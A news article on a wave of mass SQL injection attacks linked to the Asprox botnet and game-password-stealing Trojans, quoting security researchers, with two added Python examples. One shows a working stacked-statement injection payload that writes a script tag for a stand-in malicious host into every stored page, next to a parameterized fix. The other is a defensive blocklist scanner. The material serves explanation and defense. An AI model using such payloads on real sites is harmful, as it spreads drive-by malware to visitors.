New wave of SQL injection attacks alarm researchers

Researchers are uncovering a wave of SQL injection attacks, suggesting that attackers are finding it easy to compromise new targets.

Attackers looking for a quick and easy way to compromise a large number of machines increasingly are relying on an old standby that has come back into favor: SQL injection.


In recent months security researchers have uncovered a startling number of websites that have been compromised by a series of mass SQL injection attacks that take advantage of weak Web applications and then use those sites as a platform to infect visitors' PCs with malware. The trend is a worrisome one for a number of reasons, researchers say, but the biggest concern is the enormous number of sites on the Web that are vulnerable to this kind of attack and the ease with which attackers are able to find and compromise new targets.

Even relatively basic websites can have several applications running at any one time, and all it takes is a small coding error in one of those programs to give an attacker the opening he needs.

"It doesn't take a lot of effort," said Billy Hoffman, lead security researcher for the Web Security Research Group at HP, and an expert on Web application security. "There are so many Web-facing applications out there and a lot of them were written years ago and didn't go through any kind of code review."


The new wave of SQL injection attacks seems to have started earlier this year and has continued unabated since, with researchers continually finding more and more domains that have one or more compromised sites on them. The attacks can take one of several different forms, but the common denominator is that they push malicious SQL statements through otherwise legitimate Web pages. A page that builds its database query by pasting a request parameter straight into the SQL string lets the attacker supply extra SQL of his own, which the back-end database then executes as if the application had written it; in these attacks the injected statement writes a reference to a hostile script into the site's stored content, so that every page served from that database carries it. Many of the attacks are automated, using various toolkits to speed up the exploitation process, experts say.
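An added illustration of that mechanism, not code from the article or from any of the researchers quoted: a minimal page lookup written two ways in Python against an in-memory SQLite table. The vulnerable version concatenates the `id` parameter into the query the way a classic ASP page does and, because SQLite's `execute()` refuses to run more than one statement at a time, pushes the result through a small helper that emulates a driver which accepts stacked statements, as MS SQL Server does. The table, the page content, the payload and the script URL are all constructed for the example; SQLite concatenates strings with `||` where Transact-SQL would use `+`.

```python
import sqlite3

# Constructed for the example: a placeholder script URL, not a domain from the article.
INJECTED_SRC = "http://malicious.example/x.js"

# What an automated attacker appends to a numeric parameter: a second statement
# that rewrites every stored page body. Constructed payload; SQLite uses || for
# string concatenation where Transact-SQL would use +.
PAYLOAD = ("1; UPDATE pages SET body = body || "
           "'<script src=\"" + INJECTED_SRC + "\"></script>'")


def make_db():
    """Constructed sample table standing in for the site's content database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)", [
        (1, "Home", "<p>Welcome</p>"),
        (2, "About", "<p>About us</p>"),
    ])
    conn.commit()
    return conn


def exec_batch(conn, sql):
    """Emulates a driver that executes a whole ';'-separated batch, as MS SQL
    Server does for classic ASP. sqlite3's execute() rejects stacked statements,
    so the batch is split here. Returns the rows of the first statement."""
    statements = [s for s in sql.split(";") if s.strip()]
    rows = conn.execute(statements[0]).fetchall()
    for stmt in statements[1:]:
        conn.execute(stmt)
    conn.commit()
    return rows


def page_vulnerable(conn, page_id):
    """String concatenation: the request parameter becomes part of the SQL text."""
    return exec_batch(conn, "SELECT title, body FROM pages WHERE id = " + page_id)


def page_safe(conn, page_id):
    """Validate the parameter's type, then bind it; it can never be parsed as SQL."""
    try:
        pid = int(page_id)
    except ValueError:
        return []
    return conn.execute("SELECT title, body FROM pages WHERE id = ?", (pid,)).fetchall()


def infected_pages(conn):
    """Ids of rows whose stored body now carries an injected script tag."""
    return [row[0] for row in conn.execute(
        "SELECT id FROM pages WHERE body LIKE '%<script src=%' ORDER BY id")]


if __name__ == "__main__":
    db = make_db()
    print(page_vulnerable(db, PAYLOAD))   # looks like a normal page render...
    print(infected_pages(db))             # ...but every page now serves the script
    db = make_db()
    print(page_safe(db, PAYLOAD), infected_pages(db))
```

The hardened version does two things: it parses the parameter as an integer before it goes anywhere near the database, and it passes the value as a bound parameter rather than as SQL text, so even a string that slipped past the first check could not change the statement's structure. Parameterization is the actual fix; the type check is defense in depth that happens to reject this payload outright.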

One such toolkit discovered recently is the Asprox Trojan, which researchers have observed being distributed by a spam botnet in recent weeks. Joe Stewart, senior security researcher with SecureWorks, based in Atlanta, did an analysis of the Asprox Trojan, which is related to a password-stealing Trojan known as Danmec. Once the malware has infected a PC, it will download a binary that, when launched, searches Google for websites that contain specific terms. It will then launch a SQL injection attack against those sites. The result is that visitors to the site will then be forced to download a piece of malicious JavaScript code from another site. That code directs the user to a third site, where more malware is hosted, likely copies of Asprox or Danmec, Stewart says.

"The Asprox code is very similar to what is being injected by the Chinese domains that are installing the game password-stealing Trojans," Stewart said. "I don't know if they bought a copy of it from the Chinese or if it's just a copycat, but they've been successful to a certain extent. It looks like someone has taken that code and put it into a massive program to spread it as far and wide as possible."


"What's driving the attacks for the time being are copycats and the overall availability of scanning and injecting tools, which in combination with hundreds of thousands of sites with outdated web applications in place, results in the current situation - over 1.5 million pages affected," said Dancho Danchev, an independent security consultant and researcher who has been following the SQL injection attacks. "Next to the lone copycats are the botnet masters with the Asprox botnet, and its ongoing efforts to participate in the attack. Moreover, the injected malicious domains are being put in a fast-flux, namely they respond to ten different IPs of malware-infected hosts [that are] part of the network, and the IPs themselves change constantly. The current attacks can be easily described as the long tail of SQL injection attacks reaching to the far corner of the Web. They simply do some reconnaissance then exploit the vulnerable targets."

Researchers say it's virtually impossible to know how many sites have been compromised in this way, though Stewart estimates that the Asprox malware has infected about 35,000 sites so far, based on Google searches. But what is clear is that where once attackers were content just to break into one site's database and root around for interesting nuggets, now they're highly focused on owning as many PCs as possible and using those machines as platforms for other activities.

"What we're seeing is Web threats evolving just like desktop threats," said Hoffman. "These guys used to just be interested in what they could get from one site. Now, the sites are platforms to steal data and launch other attacks. They're realizing they can use those machines as resources. Why just own the machine when I can use it to install malware and jump off to other machines?"

Much of the recent SQL injection activity appears to be coming from China, and researchers around the world have been tracking the sources of the attacks. The Shadowserver Foundation has published a list of all of the domains that are injecting malicious code into other sites, and a large number of them are Chinese domains, with many of the others being .com or .info addresses.
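As an added example, not code from the article or from Shadowserver: a scan of stored page content for injected script references, of the kind a site owner might run against the content database after reading such a list. Every `<script src>` is resolved to its host and compared against a blocklist of injecting domains and an allowlist of hosts the site legitimately loads scripts from; anything on the blocklist, or external and unrecognised, is reported. The blocklist, the allowlist and the sample rows are constructed placeholders, not entries from the Shadowserver list; a real check would load the published list in place of the two names here.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed placeholders standing in for a published list of injecting domains.
BLOCKLIST = {"malicious.example", "evil.invalid"}

# Assumed: hosts this particular site legitimately serves scripts from.
ALLOWED_HOSTS = {"www.example.com", "cdn.example.com"}


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in a fragment of HTML.
    HTMLParser lower-cases tag and attribute names, so <SCRIPT SRC=...> is caught too."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value)


def script_hosts(html):
    """Hosts referenced by script tags in the fragment (inline scripts have none)."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    hosts = []
    for src in parser.srcs:
        host = urlsplit(src).hostname   # handles http://, https:// and //host/ forms
        if host:
            hosts.append(host.lower())
    return hosts


def classify(host):
    if host in BLOCKLIST:
        return "blocklisted"
    if host in ALLOWED_HOSTS:
        return "allowed"
    return "unknown-external"


def scan_rows(rows):
    """rows: iterable of (row_id, html). Returns (row_id, host, verdict) for every
    script reference that is not on the allowlist, in row order."""
    findings = []
    for row_id, html in rows:
        for host in script_hosts(html):
            verdict = classify(host)
            if verdict != "allowed":
                findings.append((row_id, host, verdict))
    return findings


# Constructed sample rows, as they might come back from SELECT id, body FROM pages.
SAMPLE_ROWS = [
    (1, '<p>Welcome</p><script src="https://cdn.example.com/app.js"></script>'),
    (2, '<p>About</p><script src="http://malicious.example/x.js"></script>'),
    (3, '<p>News</p><SCRIPT SRC="//unlisted.test/b.js"></SCRIPT>'),
    (4, '<p>Clean</p><script>inline()</script>'),
]


if __name__ == "__main__":
    for finding in scan_rows(SAMPLE_ROWS):
        print("row %d loads script from %s (%s)" % finding)
```

Reporting unknown external hosts as well as blocklisted ones matters here because, as the article notes, the injected domains change constantly; a list of known-bad domains will always lag the attack, whereas a site usually knows the handful of hosts its own pages should ever load scripts from.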

SQL injection has come back into vogue with attackers for a number of reasons, particularly the ease with which it can be automated. But it's also a maddeningly simple attack to execute, with a broad range of potential targets, making it appealing to both the low-level script kiddie and the pro who is looking for a big score.

"There's no commonality among these sites. They're just sites that have a programming mistake on them and these guys have picked the broadest attack surface possible, and that's where the SQL injection comes in," Stewart said. "They don't even have to do any work to find targets. All they do is go to Google and search for Active Server Pages that have a certain term on them. They know that ASP pages will be running MS SQL on the back end, and so then they just look for a specific argument in those pages and they're done."

The Chinese SQL injection attacks that began in March and are still carrying on are designed mainly to install Trojans that steal passwords to online games such as World of Warcraft. But, as Stewart points out, it's a short hop from stealing game passwords to swiping online banking passwords.

"It wouldn't take much effort at all. The thing that may stop them is that is a pretty serious crime in China. They've executed people for that," Stewart says. "So it could be that right now people aren't willing to take the risk."
